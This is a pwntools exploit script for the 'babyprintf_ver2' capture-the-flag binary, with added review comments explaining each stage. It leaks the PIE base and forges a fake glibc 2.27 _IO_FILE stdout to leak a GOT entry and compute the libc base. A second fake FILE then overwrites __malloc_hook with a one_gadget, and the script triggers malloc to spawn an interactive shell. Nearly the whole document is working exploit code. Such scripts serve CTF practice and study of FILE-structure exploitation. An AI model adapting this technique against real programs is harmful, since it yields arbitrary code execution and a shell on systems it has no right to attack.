from pwn import *
# Target setup: verbose pwntools I/O logging, the libc shipped with the
# challenge, the PIE binary itself, and the connection (local or remote).
context.log_level = 'debug'
# context.arch = 'amd64'   # left unset by the original author (see `shellcode`)
libc = ELF('./libc-2.27.so')
file = './babyprintf_ver2'
elf = ELF(file)
# NOTE(review): `shellcode` is never referenced later in this script, and since
# context.arch is left commented out it is assembled under pwntools' default
# arch rather than the target's.
shellcode = asm(shellcraft.sh())
local = 1
io = process(file) if local else remote('node4.buuoj.cn',25727)
def debug():
    """Attach gdb to the live target process `io` via pwntools."""
    target = io
    gdb.attach(target)
def pack_file(_flags=0,
              _IO_read_ptr=0,
              _IO_read_end=0,
              _IO_read_base=0,
              _IO_write_base=0,
              _IO_write_ptr=0,
              _IO_write_end=0,
              _IO_buf_base=0,
              _IO_buf_end=0,
              _IO_save_base=0,
              _IO_backup_base=0,
              _IO_save_end=0,
              _IO_marker=0,
              _IO_chain=0,
              _fileno=0,
              _lock=0,
              _wide_data=0,
              _mode=0):
    """Serialise a fake 64-bit glibc `_IO_FILE` (the libc-2.27 layout this script targets).

    Each keyword maps onto the struct field of the same name; fields not
    exposed here are zero-filled.  The result is exactly 0xd8 bytes, i.e. the
    struct *without* its trailing vtable pointer -- append one separately if
    the technique needs it.  Logs `_IO_write_base` through `li` as a side effect.
    """
    # Contiguous fields up to `_fileno` (offset 0x70).  The second p32 is the
    # alignment padding that follows the 4-byte `_flags` on 64-bit.
    head = b"".join((
        p32(_flags),
        p32(0),
        p64(_IO_read_ptr),
        p64(_IO_read_end),
        p64(_IO_read_base),
        p64(_IO_write_base),
        p64(_IO_write_ptr),
        p64(_IO_write_end),
        p64(_IO_buf_base),
        p64(_IO_buf_end),
        p64(_IO_save_base),
        p64(_IO_backup_base),
        p64(_IO_save_end),
        p64(_IO_marker),
        p64(_IO_chain),
        p32(_fileno),
    ))
    li('_IO_write_base', _IO_write_base)
    # Sparse tail as (offset, packed field); the gaps are zero padding.  `_mode`
    # is a 4-byte int in glibc but is written as 8 bytes here -- the surplus
    # lands in the unused bytes that follow it, before the vtable slot at 0xd8.
    blob = head
    for offset, field in ((0x88, p64(_lock)),
                          (0xa0, p64(_wide_data)),
                          (0xc0, p64(_mode))):
        blob = blob.ljust(offset, b"\x00") + field
    return blob.ljust(0xd8, b"\x00")
# Thin I/O wrappers around the pwntools tube `io`, plus a hex logger.  `li` is
# referenced inside pack_file, which is only called after this point, so the
# definition order is fine.
def r():
    """Receive whatever the target has sent so far."""
    return io.recv()


def rx(x):
    """Receive exactly `x` bytes."""
    return io.recv(x)


def ru(x):
    """Receive up to and including the delimiter `x`."""
    return io.recvuntil(x)


def rud(x):
    """Receive up to `x`, dropping the delimiter itself."""
    return io.recvuntil(x, drop=True)


def s(x):
    """Send raw bytes."""
    return io.send(x)


def sl(x):
    """Send bytes followed by a newline."""
    return io.sendline(x)


def sa(x, y):
    """Wait for `x`, then send `y`."""
    return io.sendafter(x, y)


def sla(x, y):
    """Wait for `x`, then send `y` plus a newline."""
    return io.sendlineafter(x, y)


def li(name, x):
    """Log `name` together with `x` rendered as hex."""
    return log.info(name + ':' + hex(x))


def shell():
    """Hand the tube over to the user interactively."""
    return io.interactive()
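# ---- stage 0: recover the PIE base from the address the target prints -------
ru('location to 0x')
# Exactly 12 hex digits are consumed (a 0x55.... PIE pointer); a differently
# sized leak would desynchronise the stream.
ahello = int(rx(12), 16)
li('ahello', ahello)
# 0x202010 is taken to be the offset of the leaked buffer inside the binary
# (presumably a .bss/.data slot).  A correct base is page-aligned, so bail out
# here rather than computing garbage GOT/libc addresses from a bad leak.
pie_base = ahello - 0x202010
li('pie_base', pie_base)
if pie_base & 0xfff:
    log.error(f'pie_base {pie_base:#x} is not page-aligned: leak/offset mismatch')
buf = ahello

# ---- stage 1: fake stdout whose flush leaks read@got to fd 1 (arbitrary read)
# _IO_FILE flag bits (glibc 2.27 libio.h): 0x8 = _IO_NO_WRITES (must be clear
# for the output path to run), 0x800 = _IO_CURRENTLY_PUTTING, 0x8000 =
# _IO_USER_LOCK (skips locking, so no valid `_lock` pointer is needed).
flag = 0
flag &= ~0x8
flag |= 0x800
flag |= 0x8000
li('flag', flag)
where = pie_base + elf.got['read']
# [write_base, write_ptr) covers the 8-byte GOT entry of read; flushing this
# FILE is meant to write() exactly that range to `_fileno` (1 = stdout).
# `_IO_read_end` is set equal to `_IO_write_base` so the flush path does not
# try to lseek first (glibc's new_do_write compares the two).
fake_file = pack_file(_flags=flag,
                      _IO_read_end=where,
                      _IO_write_base=where,
                      _IO_write_ptr=where + 8,
                      _fileno=1)
# 16 filler bytes, then a pointer to buf+32 (presumably where the target keeps
# its stdout/FILE pointer -- verify against the binary), 8 bytes of padding,
# and the fake FILE itself landing at buf+32 (16 + 8 + 8).
pay1 = b'A' * 16
pay1 += p64(buf + 32)
pay1 += p64(0)
pay1 += fake_file
io.recvuntil('Have fun!\n')
sl(pay1)

# ---- stage 2: libc base from the leaked pointer ------------------------------
# The leaked 64-bit LE pointer's top non-zero byte is 0x7f, so read up to the
# first 0x7f and take the last 6 bytes as the address.
read_addr = u64(ru('\x7f')[-6:].ljust(8, b'\x00'))
li('read_addr', read_addr)
libcbase = read_addr - libc.sym['read']
li('libcbase', libcbase)
# Refuse to go on if the leak does not line up with ./libc-2.27.so: the next
# stage overwrites __malloc_hook, and a wrong base would corrupt the wrong thing.
if libcbase & 0xfff:
    log.error(f'libcbase {libcbase:#x} is not page-aligned: wrong leak or wrong libc')
malloc_hook = libcbase + libc.sym['__malloc_hook']
# one_gadget offset for this particular libc-2.27.so build only; re-derive it
# (one_gadget ./libc-2.27.so) for any other build.
one = libcbase + 0x10a41c
li('one', one)

# ---- stage 3: fake stdout whose "buffer" is __malloc_hook (arbitrary write) --
flag = 0
flag &= ~0x8
flag |= 0x8000
# With _IO_NO_WRITES clear and write_ptr < write_end, printed bytes are copied
# straight into [write_ptr, write_end) -- i.e. over __malloc_hook.
fake_file = pack_file(_flags=flag,
                      _IO_write_ptr=malloc_hook,
                      _IO_write_end=malloc_hook + 8,
                      )
# Same layout as pay1 but the first 8 bytes are the one_gadget address: that is
# the data the target's next print through the fake stdout should deposit over
# __malloc_hook (assumes the target prints the buffer contents -- verify).
pay2 = p64(one) + p64(0) + p64(buf + 32) + p64(0) + fake_file
sl(pay2)
# Presumably makes the target's next iteration call malloc, so the hooked
# __malloc_hook (one_gadget) fires -- TODO confirm what the binary does here.
sl("%n")
shell()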